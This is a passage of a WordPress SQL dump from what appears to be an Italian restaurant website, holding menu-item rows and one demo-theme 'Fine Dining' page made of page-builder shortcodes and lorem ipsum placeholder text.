17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/typography-3/',95,'nav_menu_item','',0),(3428,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Classic','','publish','closed','closed','','classic-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/classic-4/',25,'nav_menu_item','',0),(3429,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Presentation','','publish','closed','closed','','presentation-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/presentation-4/',34,'nav_menu_item','',0),(3430,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Infographic','','publish','closed','closed','','infographic-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/infographic-4/',42,'nav_menu_item','',0),(3431,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Typography','','publish','closed','closed','','typography-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/typography-4/',51,'nav_menu_item','',0),(3432,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Single Types','','publish','closed','closed','','single-types-4','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/single-types-4/',62,'nav_menu_item','',0),(3433,1,'2020-12-06 18:47:42','2020-12-06 17:47:42','','Post Types','','publish','closed','closed','','post-types-3','','','2020-12-06 18:47:42','2020-12-06 17:47:42','',0,'https://www.ristorantesolymar.it/2020/12/06/post-types-3/',17,'nav_menu_item','',0),(3434,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Post Types','','publish','closed','closed','','post-types-4','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/post-types-4/',26,'nav_menu_item','',0),(3435,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Single Types','','publish','closed','closed','','single-types-5','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/single-types-5/',39,'nav_menu_item','',0),(3436,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Layouts','','publish','closed','closed','','layouts-3','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/layouts-3/',54,'nav_menu_item','',0),(3437,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Slider','','publish','closed','closed','','slider-3','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/slider-3/',49,'nav_menu_item','',0),(3438,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Portfolio','','publish','closed','closed','','portfolio-8','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/portfolio-8/',20,'nav_menu_item','',0),(3439,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Layouts','','publish','closed','closed','','layouts-4','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/layouts-4/',31,'nav_menu_item','',0),(3440,1,'2020-12-06 18:47:43','2020-12-06 17:47:43','','Slider','','publish','closed','closed','','slider-4','','','2020-12-06 18:47:43','2020-12-06 17:47:43','',0,'https://www.ristorantesolymar.it/2020/12/06/slider-4/',26,'nav_menu_item','',0),(3441,1,'2018-08-07 11:28:17','2018-08-07 11:28:17','[vc_row][vc_column][rev_slider_vc alias=\"fine-dining\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"visual pleasures\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\" content_text_aligment=\"center\" css=\".vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}\" simple_background_color=\"#e7dfdf\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" enable_fullheight=\"no\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" navigation_skin=\"dark\" enable_pagination=\"no\" enable_mousewheel_scroll=\"no\" category=\"cake\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368707127{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"Menu\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\"][vc_column][mkdf_video_button video_link=\"https://vimeo.com/183648707\" video_image=\"2020\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368714455{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"accolades\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535960592176{margin-right: 0px !important;margin-left: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1535011548259{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#e7dfdf\" content_padding=\"124px 0\" title=\"Generic inquiries\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011578720{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" content_padding=\"124px 0\" title=\"Press\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011594412{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Job Inquiries\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1535011617855{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-3 vc_col-md-6 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#ebebeb\" content_padding=\"124px 0\" title=\"Events\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][/vc_row]','Fine Dining','','publish','closed','closed','','fine-dining-2','','','2018-08-07 11:28:17','2018-08-07 11:28:17','',0,'http://attika.mikado-themes.com/?page_id=664',0,'page','',0),(3444,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3444','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3444/',2,'nav_menu_item','',0),(3445,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3445','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3445/',34,'nav_menu_item','',0),(3446,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3446','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3446/',42,'nav_menu_item','',0),(3447,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3447','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3447/',43,'nav_menu_item','',0),(3448,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3448','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3448/',41,'nav_menu_item','',0),(3449,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3449','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',3039,'https://www.ristorantesolymar.it/2020/12/06/3449/',96,'nav_menu_item','',0),(3450,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3450','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',3039,'https://www.ristorantesolymar.it/2020/12/06/3450/',52,'nav_menu_item','',0),(3451,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3451','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3451/',2,'nav_menu_item','',0),(3452,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3452','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3452/',11,'nav_menu_item','',0),(3453,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3453','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3453/',9,'nav_menu_item','',0),(3454,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3454','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3454/',10,'nav_menu_item','',0),(3455,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3455','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3455/',20,'nav_menu_item','',0),(3456,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3456','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3456/',16,'nav_menu_item','',0),(3457,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3457','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3457/',4,'nav_menu_item','',0),(3458,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3458','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3458/',3,'nav_menu_item','',0),(3459,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3459','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3459/',4,'nav_menu_item','',0),(3460,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3460','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3460/',3,'nav_menu_item','',0),(3461,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3461','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3461/',12,'nav_menu_item','',0),(3462,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3462','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3462/',19,'nav_menu_item','',0),(3463,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3463','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3463/',44,'nav_menu_item','',0),(3464,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3464','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3464/',13,'nav_menu_item','',0),(3465,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3465','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',0,'https://www.ristorantesolymar.it/2020/12/06/3465/',13,'nav_menu_item','',0),(3466,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3466','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',3034,'https://www.ristorantesolymar.it/2020/12/06/3466/',7,'nav_menu_item','',0),(3467,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3467','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',3034,'https://www.ristorantesolymar.it/2020/12/06/3467/',6,'nav_menu_item','',0),(3468,1,'2020-12-06 18:47:46','2020-12-06 17:47:46',' ','','','publish','closed','closed','','3468','','','2020-12-06 18:47:46','2020-12-06 17:47:46','',3034,'https://www.ristorantesolymar.it/2020/12/06/3468/',5,'nav_menu_item','',0),(3469,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3469','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3034,'https://www.ristorantesolymar.it/2020/12/06/3469/',18,'nav_menu_item','',0),(3470,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3470','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3034,'https://www.ristorantesolymar.it/2020/12/06/3470/',39,'nav_menu_item','',0),(3471,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3471','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3034,'https://www.ristorantesolymar.it/2020/12/06/3471/',38,'nav_menu_item','',0),(3472,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3472','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3034,'https://www.ristorantesolymar.it/2020/12/06/3472/',37,'nav_menu_item','',0),(3473,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3473','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3473/',14,'nav_menu_item','',0),(3474,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3474','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3474/',21,'nav_menu_item','',0),(3475,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3475','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3475/',15,'nav_menu_item','',0),(3476,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3476','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3476/',16,'nav_menu_item','',0),(3477,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3477','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3477/',2,'nav_menu_item','',0),(3478,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3478','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3478/',3,'nav_menu_item','',0),(3479,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3479','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3479/',2,'nav_menu_item','',0),(3480,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3480','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3480/',2,'nav_menu_item','',0),(3481,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3481','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3481/',18,'nav_menu_item','',0),(3482,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3482','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3482/',9,'nav_menu_item','',0),(3483,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3483','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3483/',9,'nav_menu_item','',0),(3484,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3484','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3484/',5,'nav_menu_item','',0),(3485,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3485','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3485/',7,'nav_menu_item','',0),(3486,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3486','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3486/',7,'nav_menu_item','',0),(3487,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3487','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3487/',5,'nav_menu_item','',0),(3488,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3488','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3488/',5,'nav_menu_item','',0),(3489,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3489','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3489/',12,'nav_menu_item','',0),(3490,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3490','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3490/',19,'nav_menu_item','',0),(3491,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3491','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3491/',17,'nav_menu_item','',0),(3492,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3492','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3492/',20,'nav_menu_item','',0),(3493,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3493','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3493/',8,'nav_menu_item','',0),(3494,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3494','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3494/',8,'nav_menu_item','',0),(3495,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3495','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3495/',4,'nav_menu_item','',0),(3496,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3061,'https://www.ristorantesolymar.it/2020/12/06/four-columns-wide-3/',57,'nav_menu_item','',0),(3497,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Four Columns','','publish','closed','closed','','four-columns-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3061,'https://www.ristorantesolymar.it/2020/12/06/four-columns-3/',56,'nav_menu_item','',0),(3498,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Three Columns','','publish','closed','closed','','three-columns-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',3061,'https://www.ristorantesolymar.it/2020/12/06/three-columns-3/',55,'nav_menu_item','',0),(3499,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Big Slider','','publish','closed','closed','','big-slider-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/big-slider-3/',65,'nav_menu_item','',0),(3500,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Small Images','','publish','closed','closed','','small-images-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/small-images-3/',64,'nav_menu_item','',0),(3501,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Big Images','','publish','closed','closed','','big-images-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/big-images-3/',63,'nav_menu_item','',0),(3502,1,'2020-12-06 18:47:47','2020-12-06 17:47:47','','Big Gallery','','publish','closed','closed','','big-gallery-3','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/big-gallery-3/',67,'nav_menu_item','',0),(3503,1,'2020-12-06 18:47:47','2020-12-06 17:47:47',' ','','','publish','closed','closed','','3503','','','2020-12-06 18:47:47','2020-12-06 17:47:47','',0,'https://www.ristorantesolymar.it/2020/12/06/3503/',6,'nav_menu_item','',0),(3504,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3504','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',0,'https://www.ristorantesolymar.it/2020/12/06/3504/',6,'nav_menu_item','',0),(3505,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3505','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3505/',70,'nav_menu_item','',0),(3506,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3506','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3506/',97,'nav_menu_item','',0),(3507,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3507','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3507/',98,'nav_menu_item','',0),(3508,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3508','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3508/',26,'nav_menu_item','',0),(3509,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3509','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3509/',53,'nav_menu_item','',0),(3510,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3510','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3510/',54,'nav_menu_item','',0),(3511,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3511','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3511/',27,'nav_menu_item','',0),(3512,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3512','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3512/',71,'nav_menu_item','',0),(3513,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3513','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3513/',73,'nav_menu_item','',0),(3514,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3514','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3514/',29,'nav_menu_item','',0),(3515,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3515','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3515/',43,'nav_menu_item','',0),(3516,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3516','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3516/',36,'nav_menu_item','',0),(3517,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3517','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3517/',44,'nav_menu_item','',0),(3518,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3518','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3518/',80,'nav_menu_item','',0),(3519,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3519','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3519/',88,'nav_menu_item','',0),(3520,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3520','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3520/',87,'nav_menu_item','',0),(3521,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3521','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3521/',79,'nav_menu_item','',0),(3522,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3522','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3522/',35,'nav_menu_item','',0),(3523,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3523','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3523/',30,'nav_menu_item','',0),(3524,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3524','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3524/',74,'nav_menu_item','',0),(3525,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3525','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3525/',81,'nav_menu_item','',0),(3526,1,'2020-12-06 18:47:48','2020-12-06 17:47:48',' ','','','publish','closed','closed','','3526','','','2020-12-06 18:47:48','2020-12-06 17:47:48','',3039,'https://www.ristorantesolymar.it/2020/12/06/3526/',37,'nav_menu_item','',0),(3527,1,'2020-12-06 18:47:48','2020-12-06 